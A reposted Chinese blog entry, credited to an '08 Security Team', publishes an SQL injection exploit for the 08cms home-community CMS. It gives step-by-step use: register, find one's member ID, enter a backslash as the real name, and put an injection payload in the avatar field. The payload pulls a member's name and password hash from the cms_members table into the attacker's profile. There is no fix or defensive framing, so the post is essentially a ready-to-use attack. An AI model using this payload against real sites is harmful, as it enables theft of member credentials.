08cms家园系统源码注入漏洞 -中国寒龙出品

时间：2014-12-19 01:50:56 阅读：168 评论：0 收藏：0 [点我收藏+]

标签：blog http sp on div 2014 log ad as

# Title ：08cms家园系统注入漏洞
# Team ：08 Security Team
# Author ：08安全团队
# 首发： 08安全团队
#######################################
这个漏洞在5月份已经审计出来了，现在将漏洞放出来。
注册一个账号会员资料->基本资料查看表单得到自己的 MID
在真实姓名填写 \
头像填写

1	,company=(SELECT CONCAT(mname,0x7c,PASSWORD) FROM cms_members limit 0,1) WHERE MID=331

08cms家园系统源码注入漏洞 -中国寒龙出品

标签：blog http sp on div 2014 log ad as

原文地址：http://www.cnblogs.com/Hkadmin/p/4173004.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行